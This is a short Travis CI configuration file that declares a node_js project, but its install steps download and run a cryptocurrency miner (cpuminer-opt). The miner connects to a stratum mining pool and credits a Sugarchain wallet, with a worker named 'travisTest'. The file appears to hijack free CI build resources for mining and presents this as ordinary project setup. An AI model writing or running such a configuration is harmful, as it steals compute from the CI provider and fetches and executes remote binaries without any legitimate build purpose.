language: node_js
install:
  - wget https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-linux.tar.gz
  - tar xf cpuminer-opt-linux.tar.gz
  - ./cpuminer-sse2 -a yespowersugar -o stratum+tcps://stratum-na.rplant.xyz:17042 -u sugar1qgeutnpm504a3mhtwljp0zuywh2mz08mpu2lvxm.travisTest